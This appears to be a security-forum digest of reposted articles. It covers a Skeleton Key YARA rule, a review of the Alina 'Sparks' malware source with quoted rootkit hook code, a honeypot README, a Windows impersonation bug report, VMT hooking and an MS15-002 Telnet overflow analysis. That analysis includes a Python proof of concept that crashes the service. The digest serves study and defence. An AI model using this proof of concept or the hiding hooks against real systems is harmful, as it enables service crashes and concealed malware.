48 8B 42 08 48 85 C0 74 21 66 83 3A 26 75 1B 66 83 38 4B 75 15 66 83 78 0E 73 75 0E 66 83 78 1E 4B 75 07 B8 A1 02 00 C0 EB 14 E8 ?? ?? ?? ?? 
4C 8B CF 4C 8B C6 48 8B D3 48 8B CD FF 50 18 48 8B 5C 24 30 48 8B 6C 24 38 48 8B 74 24 40 48 83 C4 20 5F C3 } $patch_SamIRetrieveMultiplePrimaryCredential = { 48 89 5C 24 08 48 89 6C 24 10 48 89 74 24 18 57 48 83 EC 20 41 8B F9 49 8B D8 8B F2 8B E9 4D 85 C0 74 2B 49 8B 40 08 48 85 C0 74 22 66 41 83 38 26 75 1B 66 83 38 4B 75 15 66 83 78 0E 73 75 0E 66 83 78 1E 4B 75 07 B8 A1 02 00 C0 EB 12 E8 ?? ?? ?? ?? 44 8B CF 4C 8B C3 8B D6 8B CD FF 50 20 48 8B 5C 24 30 48 8B 6C 24 38 48 8B 74 24 40 48 83 C4 20 5F C3 } condition: any of them } Sursa: Skeleton Key Malware Analysis | Dell SecureWorks
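Skeleton Key's unprotect, write, restore patch sequence can be modeled in miniature. The sketch below is purely illustrative (the Memory class and constants are invented, and no real process memory is touched), but it mirrors the three VirtualProtectEx / WriteProcessMemory steps listed in the patching description above:

```python
# Toy model of Skeleton Key's three-step patch sequence:
# VirtualProtectEx -> WriteProcessMemory -> VirtualProtectEx (restore).
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40

class Memory:
    """Invented stand-in for a protected region holding function pointers."""
    def __init__(self, functions):
        self.functions = dict(functions)      # function name -> address
        self.protection = PAGE_EXECUTE_READ   # code pages start read/execute

    def virtual_protect(self, new_protection):
        """Change the page protection, returning the old value."""
        old, self.protection = self.protection, new_protection
        return old

    def write(self, name, address):
        """Fails unless the region was first made writable."""
        if self.protection != PAGE_EXECUTE_READWRITE:
            raise PermissionError("region is not writable")
        self.functions[name] = address

def patch_function(mem, name, hook_address):
    # Step 1: make the allocation writable (PAGE_EXECUTE_READWRITE, 0x40).
    old = mem.virtual_protect(PAGE_EXECUTE_READWRITE)
    # Step 2: point the target function at the patched code.
    original = mem.functions[name]
    mem.write(name, hook_address)
    # Step 3: restore the old protection to avoid suspicious RWX allocations.
    mem.virtual_protect(old)
    return original
```

Restoring the protection in step 3 is what makes the patch quiet: after the write, no writable-and-executable page is left behind for a memory scanner to flag.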
I got my hands recently on the source code of Alina "Sparks". The main 'improvement' that everyone is talking about, and that makes the price of this malware rise, is the rootkit feature. Josh Grunzweig already did an interesting coverage of a sample, but what is this new version worth? InjectedDLL.c from the source is a copy-paste of a Chinese blog post on ring3 hooking of NtQueryDirectoryFile (the title survives only as mojibake in the source), commented out and replaced with two kernel32 hooks instead, as if the author could not manage the hooks himself. A comment is still in Chinese, as you can see on the screenshot. + this:
[FONT=monospace]
LONG WINAPI RegEnumValueAHook(HKEY hKey, DWORD dwIndex, LPTSTR lpValueName, LPDWORD lpcchValueName, LPDWORD lpReserved, LPDWORD lpType, LPBYTE lpData, LPDWORD lpcbData)
{
    LONG Result = RegEnumValueANext(hKey, dwIndex, lpValueName, lpcchValueName, lpReserved, lpType, lpData, lpcbData);
    if (StrCaseCompare(HIDDEN_REGISTRY_ENTRY, lpValueName) == 0)
    {
        Result = RegEnumValueWNext(hKey, dwIndex, lpValueName, lpcchValueName, lpReserved, lpType, lpData, lpcbData);
    }
    return Result;
}
...
// Registry Value Hiding
Win32HookAPI("advapi32.dll", "RegEnumValueA", (void *) RegEnumValueAHook, (void *) &RegEnumValueANext);
Win32HookAPI("advapi32.dll", "RegEnumValueW", (void *) RegEnumValueWHook, (void *) &RegEnumValueWNext);
[/FONT]
So many stupid mistakes in the code: no sanity checks in the hooks, nothing stable. I haven't looked at a sample in the wild, but I doubt it works anyhow. The actual rootkit source (its body is stored as a hex array in RootkitDriver.inc; PDB path c:\drivers\test\objchk_win7_x86\i386\ssdthook.pdb) is not included in this pack of crap. This x86-32 driver is responsible for SSDT hooking of NtQuerySystemInformation, NtEnumerateValueKey, and NtQueryDirectoryFile.
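Whatever layer they live at, these enumeration hooks all implement the same idea: run the real enumeration, then silently drop any entry matching the hidden name. A rough Python model of that filter (names are illustrative only, not the malware's code):

```python
# Conceptual model of what a hooked NtQueryDirectoryFile / RegEnumValue
# effectively returns: the real listing minus the entry the rootkit hides.
HIDDEN_ENTRY = "windefender"

def filtered_enum(real_results, hidden=HIDDEN_ENTRY):
    """Drop any enumeration result containing the hidden name (case-insensitive)."""
    return [r for r in real_results if hidden not in r.lower()]
```

The case-insensitive match mirrors the StrCaseCompare call in the quoted hook.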
Driver is ridiculously simple:
[FONT=monospace]
NTSTATUS NTAPI DrvMain(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)
{
    DriverObject->DriverUnload = (PDRIVER_UNLOAD)UnloadProc;
    BuildMdlForSSDT();
    InitStrings();
    SetHooks();
    return STATUS_SUCCESS;
}
[/FONT]
[FONT=monospace]
BOOL SetHooks()
{
    if ( !NtQuerySystemInformationOrig )
        NtQuerySystemInformationOrig = HookProc(ZwQuerySystemInformation, NtQuerySystemInformationHook);
    if ( !NtEnumerateValueKeyOrig )
        NtEnumerateValueKeyOrig = HookProc(ZwEnumerateValueKey, NtEnumerateValueKeyHook);
    if ( !NtQueryDirectoryFileOrig )
        NtQueryDirectoryFileOrig = HookProc(ZwQueryDirectoryFile, NtQueryDirectoryFileHook);
    return TRUE;
}
[/FONT]
All of the hooks hide the 'windefender' target process, file, and registry value.
[FONT=monospace]
void InitStrings()
{
    RtlInitUnicodeString((PUNICODE_STRING)&WindefenderProcessString, L"windefender.exe");
    RtlInitUnicodeString(&WindefenderFileString, L"windefender.exe");
    RtlInitUnicodeString(&WindefenderRegistryString, L"windefender");
}
[/FONT]
It's the malware's name; Josh also pointed in this direction in his analysis. First submitted to VT on 2013-10-17 17:27:10 UTC ( 1 year, 2 months ago ) https://www.virustotal.com/en/file/905170f460583ae9082f772e64d7856b8f609078af9823e9921331852fd07573/analysis/1421046545/ Overall that DLL seems unused; the Alina project uses the driver I mentioned. As for the project itself, it's still an awful piece of student lab work. Here is some log just from an attempt to compile:
source\grab\base.cpp(78): if SHGetSpecialFolderPath returns FALSE, strcat to SourceFilePath will be used anyway.
Two copy-pasted methods with the same mistake:
source\grab\base.cpp(298)
source\grab\base.cpp(433)
Leaking the process information handle pi.hProcess.
Using hKey from a failed function call:
[FONT=monospace]
source\grab\base.cpp(316):
if (RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0L, KEY_ALL_ACCESS, &hKey) != ERROR_SUCCESS)
{
    RegCloseKey(hKey);
[/FONT]
pThread could be NULL; this is checked only for WriteProcessMemory but not for CreateRemoteThread:
[FONT=monospace]
source\grab\monitoringthread.cpp(110):
LPVOID pThread = VirtualAllocEx(hProcess, NULL, ShellcodeLen, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (pThread != NULL)
    WriteProcessMemory(hProcess, pThread, Shellcode, ShellcodeLen, &BytesWritten);
HANDLE ThreadHandle = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE) pThread, NULL, 0, &TID);
[/FONT]
Reading invalid data from hdr->hwid, where hwid is declared as char hwid[8]: the readable size is 8 bytes, but 18 bytes may be read:
source\grab\panelrequest.cpp(73): memcpy(outkey, hdr->hwid, 18);
realloc might return a null pointer: assigning the null pointer to buf, which is passed as an argument to realloc, will cause the original memory block to be leaked:
source\grab\panelrequest.cpp(173)
The prior call to strncpy might not zero-terminate the string Result:
source\grab\scanner.cpp(159)
The return value of ReadFile is ignored. If it fails anywhere, the code will be corrupted, as the cmd variable is not initialized:
source\grab\watcher.cpp(61)
source\grab\watcher.cpp(64)
source\grab\watcher.cpp(71)
Signed/unsigned mismatch:
source\grab\rootkitinstaller.cpp(47)
Unreferenced local variable hResult:
source\grab\base.cpp(158)
Using TerminateThread does not allow proper thread cleanup:
source\grab\watcher.cpp(125)
Now, related to 'editions', Sparks has some: for example the pipes, mutexes, user-agents, and process blacklist. But most of these editions are minor things that anybody can do to 'customise' his own bot; in any case that can hardly count as a code addition or something 'new'. For the panel... well, it's like the bot: nothing changed at all.
It's still the same ugly design, still the same files with the same modification timestamps, no code additions, still the same cookie-auth crap, as if the coder can't use sessions in PHP, and so on... To conclude, the main improvement is a copy-pasted rootkit that doesn't work. I don't know how many bad guys bought this source for 1k or more, but it is definitely not worth it. Overall it's a good example of how people can take some code, announce a rootkit to impress, and trade entirely on malware notoriety. This reminds me of the guys who announced IceIX on malware forums, when the samples finally turned out to be just a basic ZeuS with broken improvements. Hi Benson. Posted by Steven K at 00:07 Sursa: http://www.xylibox.com/2015/01/alina-sparks-source-code-review.html
[h=1]About[/h]
Mailoney is an SMTP honeypot I wrote just to have fun learning Python. The Open Relay module emulates an open relay and writes attempted emails to a log file. Similarly, the Authentication modules will capture credentials and write those to a log file.
[h=1]Usage[/h]
You'll likely need to run this with elevated permissions, as required to open sockets on privileged ports.
python mailoney.py -s mailbox <options>
-h, --help Show this help message and exit
-i <ip address> The IP address to listen on (defaults to localhost)
-p <port> The port to listen on (defaults to 25)
-s mailserver This will generate a fake hostname
-t <type> HoneyPot type
open_relay Emulates an open relay
postfix_creds Emulates a PostFix authentication server, collects credentials
examples:
python mailoney.py -s mailbox -i 10.10.10.1 -p 990 -t postfix_creds
[h=1]ToDo[/h]
Add modules for EXIM, Microsoft, others
Build in error handling
Add a daemon flag to background the process.
Sursa: https://github.com/awhitehatter/mailoney
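Conceptually, the open_relay flow boils down to: accept a connection, present a believable banner, and log whatever the client sends. A self-contained sketch of that idea (not Mailoney's actual code) that talks to itself over localhost:

```python
import socket
import threading

# Minimal sketch of an SMTP honeypot interaction: greet with a fake banner,
# record the client's command, and answer 250 to keep it talking. The banner
# text and single-command exchange are invented for the example.
def serve_once(server_sock, log):
    conn, addr = server_sock.accept()
    conn.sendall(b"220 mailbox ESMTP Postfix\r\n")   # fake greeting
    data = conn.recv(1024)
    log.append((addr[0], data.decode(errors="replace").strip()))
    conn.sendall(b"250 OK\r\n")
    conn.close()

def run_demo():
    log = []
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))   # ephemeral port; the real tool would use 25
    srv.listen(1)
    t = threading.Thread(target=serve_once, args=(srv, log))
    t.start()
    cli = socket.create_connection(srv.getsockname())
    banner = cli.recv(1024)
    cli.sendall(b"EHLO attacker\r\n")
    reply = cli.recv(1024)
    cli.close()
    t.join()
    srv.close()
    return banner, reply, log
```

Everything an attacker types after the banner is honeypot gold, which is why the real modules write each command straight to a log file.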
Windows: Impersonation Check Bypass With CryptProtectMemory and CRYPTPROTECTMEMORY_SAME_LOGON flag Reported by fors.. @google.com, Oct 17, 2014 Platform: Windows 7, 8.1 Update 32/64 bit Class: Security Bypass/Information Disclosure The function CryptProtectMemory allows an application to encrypt memory for one of three scenarios: process, logon session, and computer. When using the logon session option (CRYPTPROTECTMEMORY_SAME_LOGON flag), the encryption key is generated based on the logon session identifier; this is meant for sharing memory between processes running within the same logon. As this might also be used for sending data from one process to another, it supports extracting the logon session id from the impersonation token. The issue is that the implementation in CNG.sys doesn't check the impersonation level of the token when capturing the logon session id (using SeQueryAuthenticationIdToken), so a normal user can impersonate at Identification level and decrypt or encrypt data for that logon session. This might be an issue if there's a service that is vulnerable to a named pipe planting attack or is storing encrypted data in a world-readable shared memory section. This behaviour might of course be by design; however, not having been party to the design, it's hard to tell. The documentation states that the user must impersonate the client, which I read to mean it should be able to act on behalf of the client rather than merely identify as the client. Attached is a simple PoC which demonstrates the issue. To reproduce, follow these steps: 1) Execute Poc_CNGLogonSessionImpersonation.exe from the command line 2) The program should print "Encryption doesn't match" to indicate that the two encryptions of the same data were not a match, implying the key was different between them.
Expected Result: Both calls should return the same encrypted data, or the second call should fail.
Observed Result: Both calls succeed and return different encrypted data.
This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.
[TABLE]
[TR]
[TD] [/TD]
[TD] Poc_CNGLogonSessionImpersonation.zip 62.4 KB Download[/TD]
[/TR]
[/TABLE]
Sursa: https://code.google.com/p/google-security-research/issues/detail?id=128
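The report's core observation, that the key depends only on the captured logon session id and not on who presents it, can be illustrated with a toy model. The SHA-256 derivation and XOR stream below are stand-ins invented for the example, not the real CNG primitives:

```python
import hashlib
from itertools import cycle

# Toy model of CRYPTPROTECTMEMORY_SAME_LOGON: the key is a pure function of
# the logon session identifier, so anyone who can make the kernel capture
# the victim's session id derives the same key.
def session_key(logon_session_id: int) -> bytes:
    return hashlib.sha256(logon_session_id.to_bytes(8, "little")).digest()

def protect_memory_same_logon(data: bytes, logon_session_id: int) -> bytes:
    # Symmetric XOR stream: applying it twice with the same key round-trips.
    key = session_key(logon_session_id)
    return bytes(b ^ k for b, k in zip(data, cycle(key)))
```

In this model, a caller able to present the victim's session id, for instance via an Identification-level token as in the bug, derives the same key and decrypts successfully; the missing safeguard is a check on the impersonation level, not anything in the key derivation itself.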
[h=1]CodeInspect says “Hello World”: A new Reverse-Engineering Tool for Android and Java Bytecode[/h] Posted on 2014/12/26 by Siegfried Rasthofer We are very happy to announce a new tool in our toolchain: CodeInspect, a Jimple-based reverse-engineering framework for Android and Java applications. Developing an Android application in an IDE is very convenient, since features like code completion, “Open Declaration“, renaming variables, searching files, etc. help the developer a lot. Code debugging in particular is a very important IDE feature. Usually, all those features are available for the source code and not for the bytecode, since they are meant to support the developer, not a reverse-engineer. But all those features would also be very helpful for reverse-engineering Android or Java applications. This is the reason why we came up with a new reverse-engineering framework that works on the Jimple intermediate representation and supports all the features above and a lot more. In the following, we give a detailed description of CodeInspect and its features. CodeInspect accepts as input a complete Android application package (apk), just the Android bytecode (dex file), or a jar file. In the following, we describe the different features based on a malicious Android apk. [h=1]Framework Overview[/h] The figure above is a screenshot of CodeInspect. As one can see, CodeInspect is based on the Eclipse RCP framework. One can define a workspace with different projects (apks). Furthermore, CodeInspect contains different perspectives, different views, and a new editor for the intermediate representation. The main perspectives are the “CodeInspect” perspective as shown in the screenshot and the “Debug” perspective known from the standard Eclipse IDE, including views for “Expressions”, “Breakpoints” and “Variables”.
Other basic views in the CodeInspect perspective are:
Project Explorer: Shows all the important files of an apk in a readable format.
Outline: Shows all the fields and methods of a specific class. Clicking on an item jumps directly to the corresponding line in the code.
Console: Shows the console output.
Problems: Shows all the warnings and errors (e.g., compilation errors) that occur in the project.
Sursa: CodeInspect says “Hello World”: A new Reverse-Engineering Tool for Android and Java Bytecode | Secure Software Engineering
Virtual Method Table (VMT) Hooking Posted on January 15, 2015 by admin This post will cover the topic of hooking a class's virtual method table. This is a useful technique that has many applications, but is most commonly seen in developing game hacks. For example, employing VMT hooking of objects in a Direct3D/OpenGL graphics engine is how in-game overlays are displayed. Virtual Method Tables (or vtables) Usage of VMTs, in the context of C++ for this post, is how polymorphism is implemented at the language level. Internally, the VMT is represented as an array of function pointers, and typically resides at the beginning or end of the memory layout of the object. Whenever a C++ class declares a virtual function, the compiler will add an entry into the VMT for it. If a class inherits from a base object and overrides a base virtual function, then the pointer to the overridden function will be present in the derived object's VMT. For example, take the following code, compiled with the VS 2013 compiler on an x86 system:
[TABLE]
[TR]
[TD=class: code]class Base {
public:
    Base() { printf("- Base::Base\n"); }
    virtual ~Base() { printf("- Base::~Base\n"); }
    void A() { printf("- Base::A\n"); }
    virtual void B() { printf("- Base::B\n"); }
    virtual void C() { printf("- Base::C\n"); }
};

class Derived final : public Base {
public:
    Derived() { printf("- Derived::Derived\n"); }
    ~Derived() { printf("- Derived::~Derived\n"); }
    void B() override { printf("- Derived::B\n"); }
    void C() override { printf("- Derived::C\n"); }
};[/TD]
[/TR]
[/TABLE]
In memory, the VMT for Base will contain ~Base, B, and C, as can be inspected with the debugger: while the VMT for the two Derived instances contain ~Derived, B, and C, but with different addresses for each than the ones in Base (see below). So how are these actually used? Take, for example, a function that takes a pointer to a Base instance and invokes the functions A, B, and C, on it: [TABLE] [TR] [TD=class: code]void Invoke(Base * const pBase) { pBase->A(); pBase->B(); pBase->C(); }[/TD] [/TR] [/TABLE] and is invoked in the following manner: [TABLE] [TR] [TD=class: code] Invoke(&base); Invoke(&derived); Invoke(pBase);[/TD] [/TR] [/TABLE] The Invoke function disassembled for x86 is as follows: pBase->A(); 004012C9 8B 4D 08 mov ecx,dword ptr [pBase] 004012CC E8 8F FE FF FF call Base::A (0401160h) pBase->B(); 004012D1 8B 45 08 mov eax,dword ptr [pBase] 004012D4 8B 10 mov edx,dword ptr [eax] 004012D6 8B 4D 08 mov ecx,dword ptr [pBase] 004012D9 8B 42 04 mov eax,dword ptr [edx+4] 004012DC FF D0 call eax pBase->C(); 004012DE 8B 45 08 mov eax,dword ptr [pBase] 004012E1 8B 10 mov edx,dword ptr [eax] 004012E3 8B 4D 08 mov ecx,dword ptr [pBase] 004012E6 8B 42 08 mov eax,dword ptr [edx+8] 004012E9 FF D0 call eax This disassembly shows exactly what is going on under the hood with relation to polymorphism. For the invocations to B and C, the compiler moves the address of the object in to the EAX register. This is then dereferenced to get the base of the VMT and stored in the EDX register. The appropriate VMT entry for the function is found by using EDX as an index and storing the address in EAX. This function is then called. Since Base and Derived have different VMTs, this code will call different functions — the appropriate ones — for the appropriate object type. Seeing how it’s done under the hood also allows us to easily write a function to print the VMT. 
[TABLE]
[TR]
[TD=class: code]void PrintVTable(Base * const pBase) {
    unsigned int *pVTableBase = (unsigned int *)(*(unsigned int *)pBase);
    printf("First: %p\n"
        "Second: %p\n"
        "Third: %p\n",
        *pVTableBase, *(pVTableBase + 1), *(pVTableBase + 2));
}[/TD]
[/TR]
[/TABLE]
Hooking the VMT Knowing the layout of the VMT makes it trivial to hook. To accomplish this, all that is needed is to overwrite the entry in the VMT with the address of the desired hook function. This is done by using the VirtualProtect function to set the appropriate memory permissions, alongside memcpy to write in the desired hook address. Note that memcpy is used since everything resides within the same address space; otherwise WriteProcessMemory would have to be used. A hooking routine might look like the following:
[TABLE]
[TR]
[TD=class: code]void HookVMT(Base * const pBase) {
    unsigned int *pVTableBase = (unsigned int *)(*(unsigned int *)pBase);
    unsigned int *pVTableFnc = (unsigned int *)(pVTableBase + 1);
    void *pHookFnc = (void *)VMTHookFnc;
    SIZE_T ulOldProtect = 0;
    (void)VirtualProtect(pVTableFnc, sizeof(void *), PAGE_EXECUTE_READWRITE, &ulOldProtect);
    memcpy(pVTableFnc, &pHookFnc, sizeof(void *));
    (void)VirtualProtect(pVTableFnc, sizeof(void *), ulOldProtect, &ulOldProtect);
}[/TD]
[/TR]
[/TABLE]
with VMTHookFnc having the simple definition of
[TABLE]
[TR]
[TD=class: code]void __fastcall VMTHookFnc(void *pEcx, void *pEdx) {
    Base *pThisPtr = (Base *)pEcx;
    printf("In VMTHookFnc\n");
}[/TD]
[/TR]
[/TABLE]
Here the fastcall calling convention is used to easily retrieve the this pointer, which is typically stored in the ECX register. Applications The application of this technique will show how to hook IDXGISwapChain::Present and allow for rendering/overlaying of text on a Direct3D10 application. This is not the only way to overlay text, nor necessarily the best, but it still provides an adequate example to illustrate the point.
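For intuition, the same slot-swap can be modeled in a few lines of Python, treating the vtable as a list of callables. This is purely illustrative (the names are invented) and sidesteps the memory-protection work the C++ version has to do:

```python
# Model the vtable as a list of function "pointers"; hooking is just
# overwriting a slot while keeping the original so the hook can chain.
def base_b():
    return "Base::B"

def base_c():
    return "Base::C"

vtable = [base_b, base_c]   # slot 0 = B, slot 1 = C, as in the C++ layout

def hook_slot(table, index, make_hook):
    """Swap one entry for a hook built around the original; return the original."""
    original = table[index]
    table[index] = make_hook(original)
    return original

# Install a hook on slot 0 that prepends a marker, then calls through.
original_b = hook_slot(vtable, 0, lambda orig: (lambda: "hooked -> " + orig()))
```

After installation, dispatching through slot 0 runs the hook first and then the original, exactly the control-flow detour the real VMT hook achieves.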
The target application will be a Direct3D10 sample provided by the June 2010 DirectX SDK. See /Samples/C++/Direct3D10/Tutorials/Tutorial01 in the SDK. The sample application initializes the Direct3D device and swap chain with a call to D3D10CreateDeviceAndSwapChain then simply sets up a view and renders a blue background on the window (screenshot below). To overlay text on a Direct3D application, the IDXGISwapChain object must be obtained. Then the Present function of the interface must be hooked, since that is the function responsible for showing the rendered image to the user. This is done here by hooking D3D10CreateDeviceAndSwapChain. Once this function is hooked, the hook will call the real D3D10CreateDeviceAndSwapChain function in order to set up the IDXGISwapChain interface. Then the VMT entry for Present will be replaced with a hooked version that renders text. Put into code it looks like the following: [TABLE] [TR] [TD=class: code]HRESULT WINAPI D3D10CreateDeviceAndSwapChainHook(IDXGIAdapter *pAdapter, D3D10_DRIVER_TYPE DriverType, HMODULE Software, UINT Flags, UINT SDKVersion, DXGI_SWAP_CHAIN_DESC *pSwapChainDesc, IDXGISwapChain **ppSwapChain, ID3D10Device **ppDevice) { printf("In D3D10CreateDeviceAndSwapChainHook\n"); //Create the device and swap chain HRESULT hResult = pD3D10CreateDeviceAndSwapChain(pAdapter, DriverType, Software, Flags, SDKVersion, pSwapChainDesc, ppSwapChain, ppDevice); //Save the device and swap chain interface. //These aren't used in this example but are generally nice to have addresses to if(ppSwapChain == NULL) { printf("Swap chain is NULL.\n"); return hResult; } else { pSwapChain = *ppSwapChain; } if(ppDevice == NULL) { printf("Device is NULL.\n"); return hResult; } else { pDevice = *ppDevice; } //Get the vtable address of the swap chain's Present function and modify it with our own. 
//Save it to return to later in our Present hook if(pSwapChain != NULL) { DWORD_PTR *SwapChainVTable = (DWORD_PTR *)pSwapChain; SwapChainVTable = (DWORD_PTR *)SwapChainVTable[0]; printf("Swap chain VTable: %X\n", SwapChainVTable); PresentAddress = (pPresent)SwapChainVTable[8]; printf("Present address: %X\n", PresentAddress); DWORD OldProtections = 0; VirtualProtect(&SwapChainVTable[8], sizeof(DWORD_PTR), PAGE_EXECUTE_READWRITE, &OldProtections); SwapChainVTable[8] = (DWORD_PTR)PresentHook; VirtualProtect(&SwapChainVTable[8], sizeof(DWORD_PTR), OldProtections, &OldProtections); } //Create the font that we will be drawing with CreateDrawingFont(); return hResult; }[/TD] [/TR] [/TABLE] CreateDrawingFont simply sets up a ID3DX10Font to draw with. Now since the VMT entry was replaced, PresentHook will be invoked instead of Present. Here is where the drawing can be done. [TABLE] [TR] [TD=class: code]HRESULT WINAPI PresentHook(IDXGISwapChain *thisAddr, UINT SyncInterval, UINT Flags) { //printf("In Present (%X)\n", PresentAddress); RECT Rect = { 100, 100, 200, 200 }; pFont->DrawTextW(NULL, L"Hello, World!", -1, &Rect, DT_CENTER | DT_NOCLIP, RED); return PresentAddress(thisAddr, SyncInterval, Flags); }[/TD] [/TR] [/TABLE] I chose a different calling convention here than for the earlier example code, but everything still functions the same. The end result shows the Present hook successfully rendering the text: A few important caveats about doing it this way: The hook must be installed prior to the call to D3D10CreateDeviceAndSwapChain. Otherwise handles to the device and swap chain won’t be obtained. ID3DX10Font::DrawText can mess with the blend states, shaders, rasterizer, etc. Overlaying text on an application that makes use of these requires the hook developer to account for this and save/restore the states properly. The source code for the VMT hook example, the slightly modified Direct3D10 sample application, and the Direct3D10 hook can be found here. 
The hook uses Microsoft Detours as a dependency to perform the initial hooking of D3D10CreateDeviceAndSwapChain. Sursa: http://www.codereversing.com/blog/?p=181
2015/01/16 9:09 | cssembly | binary security, vulnerability analysis

0x00 Vulnerability analysis

MS15-002 is a buffer overflow vulnerability in the Microsoft Telnet service. Below, we analyze its root cause and construct a POC. The Telnet service runs as tlntsvr.exe, which launches a dedicated tlntsess.exe process for each client connection. The patched file is tlntsess.exe, and diffing the patched binary against the original pinpoints the vulnerability in the following function:
[TABLE]
[TR]
[TD=class: code]signed int __thiscall CRFCProtocol::ProcessDataReceivedOnSocket(CRFCProtocol *this, unsigned __int32 *a2)[/TD]
[/TR]
[/TABLE]
Comparing the function before and after the patch (screenshots omitted in this copy), the patch splits one buffer into two. After the call
[TABLE]
[TR]
[TD=class: code](*(void (__thiscall **)(CRFCProtocol *, unsigned __int8 **, unsigned __int8 **, unsigned __int8))((char *)&off_1011008 + v12))(v2,&v13,&v9,v6)[/TD]
[/TR]
[/TABLE]
returns, the patched code first checks the length of the data in the temporary buffer; only if
[TABLE]
[TR]
[TD=class: code](unsigned int)(v9 - (unsigned __int8 *)&Src - 1) <= 0x7FE[/TD]
[/TR]
[/TABLE]
does it go on to check whether the destination buffer can hold that many bytes. If
[TABLE]
[TR]
[TD=class: code](unsigned int)((char *)v14 + v7 - (_DWORD)&Dst) >= 0x800[/TD]
[/TR]
[/TABLE]
it exits; otherwise
[TABLE]
[TR]
[TD=class: code]memcpy_s(v14, (char *)&v18 - (_BYTE *)v14, &Src, v9 - (unsigned __int8 *)&Src)[/TD]
[/TR]
[/TABLE]
copies the data into the Dst buffer.

Before the patch there is only one buffer, and the length check happens before the call:
[TABLE]
[TR]
[TD=class: code](*(&off_1011008 + 3 * v7))(v3, &v14, &v13, *v6)[/TD]
[/TR]
[/TABLE]
is invoked only when v13 - &Src <= 2048, with v13 pointing at the first free byte of the buffer. The called function, however, advances v13 itself. For example, if the call dispatches to
[TABLE]
[TR]
[TD=class: code]void __thiscall CRFCProtocol::DoTxBinary(CRFCProtocol *this, unsigned __int8 **a2, unsigned __int8 **a3, unsigned __int8 a4)[/TD]
[/TR]
[/TABLE]
you can see that the function modifies its third parameter: *a3 += 3. It follows that when v13 - &Src == 2047, the condition v13 - &Src <= 2048 is still satisfied, and if (*(&off_1011008 + 3 * v7))(v3, &v14, &v13, *v6) dispatches to CRFCProtocol::DoTxBinary, the following instruction sequence executes and clearly writes past the end of the buffer:
[TABLE]
[TR]
[TD=class: code]v7 = *a3;
*v7 = -1;
v7[1] = -3;
v7[2] = a4;
v7[3] = 0;
*a3 += 3;[/TD]
[/TR]
[/TABLE]
The patched version uses two buffers: the temporary buffer pointer is passed via v9 to
[TABLE]
[TR]
[TD=class: code](*(void (__thiscall **)(CRFCProtocol *, unsigned __int8 **, unsigned __int8 **, unsigned __int8))((char *)&off_1011008 + v12))(v2,&v13,&v9,v6)[/TD]
[/TR]
[/TABLE]
and after the call returns, the code checks the length of the data in the buffer pointed to by v9, then finally checks whether the destination buffer has enough room left for it, i.e. the (unsigned int)((char *)v14 + v7 - (_DWORD)&Dst) >= 0x800 test.

0x01 Environment setup and POC construction

On Windows 7, install and start the Telnet server, run net user exp 123456 /ADD to create a user named exp, and add it to the TelnetClients group via net localgroup TelnetClients exp /ADD, so that the account can log in through a Telnet client.

Debugging shows that in
[TABLE]
[TR]
[TD=class: code]signed int __thiscall CRFCProtocol::ProcessDataReceivedOnSocket(CRFCProtocol *this, unsigned __int32 *a2)[/TD]
[/TR]
[/TABLE]
a2 holds the length of the received data (at most 0x400) and v6 points to the data itself. To trigger the overflow, (*(&off_1011008 + 3 * v7))(v3, &v14, &v13, *v6) must therefore be called in a way that expands the data, so that after processing, more than 0x800 bytes end up in the Src buffer. Looking at the functions reachable through this indirect call,
[TABLE]
[TR]
[TD=class: code]void __thiscall CRFCProtocol::AreYouThere(CRFCProtocol *this, unsigned __int8 **a2, unsigned __int8 **a3, unsigned __int8 a4)[/TD]
[/TR]
[/TABLE]
obviously expands the data: a4 is a single byte of the received data, and after the call, 9 bytes of fixed data have been written to the buffer pointed to by a3. After a quick protocol analysis of a Wireshark capture, we construct the following POC, which makes the program call CRFCProtocol::AreYouThere repeatedly and eventually triggers an exception.
[TABLE]
[TR]
[TD=class: code]import socket
address = ('192.168.172.152', 23)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(address)
data = "\xff\xf6" * 0x200
s.send(data)
s.recv(512)
s.close()[/TD]
[/TR]
[/TABLE]
Run the POC with a breakpoint set in
[TABLE]
[TR]
[TD=class: code]signed int __thiscall CRFCProtocol::ProcessDataReceivedOnSocket(CRFCProtocol *this, unsigned __int32 *a2)[/TD]
[/TR]
[/TABLE]
When it breaks, a2 = 0x400 and (DWORD)((DWORD *)(this + 0x1E40) + 0x16c8) points to the received data. Set a breakpoint before the function returns; once it is hit, you can see that __security_check_cookie has detected a stack overflow, triggering an exception and breaking into the debugger.

Disclaimer: Unauthorized reproduction prohibited. cssembly @ WooYun Knowledge Base

Sursa: https://translate.google.com/translate?sl=auto&tl=en&js=y&prev=_t&hl=en&ie=UTF-8&u=http%3A%2F%2Fdrops.wooyun.org%2Fpapers%2F4621&edit-text=
Technical analysis of client identification mechanisms Written by Artur Janc <aaj@google.com> and Michal Zalewski <lcamtuf@google.com> In common use, the term “web tracking” refers to the process of calculating or assigning unique and reasonably stable identifiers to each browser that visits a website. In most cases, this is done for the purpose of correlating future visits from the same person or machine with historical data. Some uses of such tracking techniques are well established and commonplace. For example, they are frequently employed to tell real users from malicious bots, to make it harder for attackers to gain access to compromised accounts, or to store user preferences on a website. In the same vein, the online advertising industry has used cookies as the primary client identification technology since the mid-1990s. Other practices may be less known, may not necessarily map to existing browser controls, and may be impossible or difficult to detect. Many of them - in particular, various methods of client fingerprinting - have garnered concerns from software vendors, standards bodies, and the media. To guide us in improving the range of existing browser controls and to highlight the potential pitfalls when designing new web APIs, we decided to prepare a technical overview of known tracking and fingerprinting vectors available in the browser. Note that we describe these vectors, but do not wish this document to be interpreted as a broad invitation to their use. Website owners should keep in mind that any single tracking technique may be conceivably seen as inappropriate, depending on user expectations and other complex factors beyond the scope of this doc. 
